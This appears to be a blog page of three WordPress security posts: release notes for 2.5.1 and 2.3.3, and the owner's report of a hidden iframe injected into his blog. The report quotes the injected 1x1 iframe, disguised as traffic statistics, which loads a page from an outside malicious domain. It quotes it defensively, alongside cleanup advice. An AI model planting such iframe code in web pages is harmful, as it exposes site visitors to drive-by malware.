Oh no, not again! Well, better upgrade soon or get risk of losing your blog. Thanks WordPress. Keep the upgrade coming.

Version 2.5.1 of WordPress is now available. It includes a number of bug fixes, performance enhancements, and one very important security fix. We recommend everyone update immediately, particularly if your blog has open registration. The vulnerability is not public but it will be shortly.

In addition to the security fix, 2.5.1 contains many bug fixes. If you are interested only in the security fixes, you can download these corrected copies of wp-includes/pluggable.php, wp-admin/includes/media.php, and wp-admin/media.php. Replace your existing copies of these files with these new copies.

If you download the entire 2.5.1 release, you will be getting over 70 other fixes. 2.5.1 focuses on fixing the most annoying bugs and improving performance. Here are some highlights:

• Performance improvements for the Dashboard, Write Post, and Edit Comments pages.
• Better performance for those who have many categories
• Media Uploader fixes
• An upgrade to TinyMCE 3.0.7
• Widget Administration fixes
• Various usability improvements
• Layout fixes for IE

Popularity: 3% [?]

Today I Google Search for Richard Palace and to my surprise, I found my site, RichardPalace.com, has been identified to contain malicious software. Immediately, I checked with No Script Add-ons for FireFox and discover a domain which is rather unfamiliar. The domain is wp-stats-php.info and I thought the site was related to WordPress correcting some Stats, but it was not. I then checked my site source code for the domain name wp-stats-php and found the following code:

<!– Traffic Statistics –> <iframe src=”http://www.wp-stats-php.info/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe> <!– End Traffic Statistics –>

This code was inserted on my blog post on 11th Nov 2007 by someone or software. I immediately removed it and asked Google to review my site so as to remove “This site may harm your computer” tag. I am not sure how this iframe code got into my blog. If it happens to me, it can also happen to you.

If you are using wordpress, I suggest you do the following:
1) Upgrade wordpress to the latest version.
2) Change your theme.
3) Check your site source code regularly for “iframe”.

Popularity: 6% [?]

WordPress 2.3.3 is an urgent security release. If you have registration enabled a flaw was found in the XML-RPC implementation such that a specially crafted request would allow a user to edit posts of other users on that blog. In addition to fixing this security flaw, 2.3.3 fixes a few minor bugs. If you are interested only in the security fix, download the fixed version of xmlrpc.php and copy it over your existing xmlrpc.php. Otherwise, you can get the entire release here.

Also, there is a vulnerability in the WP-Forum plugin that is being actively exploited right now. If you are using this plugin, please remove it until an update is available from its author.

Since we are talking security, remember to use strong passwords and change them regularly. While you’re updating WP and your plugins, consider refreshing your passwords.

Popularity: 4% [?]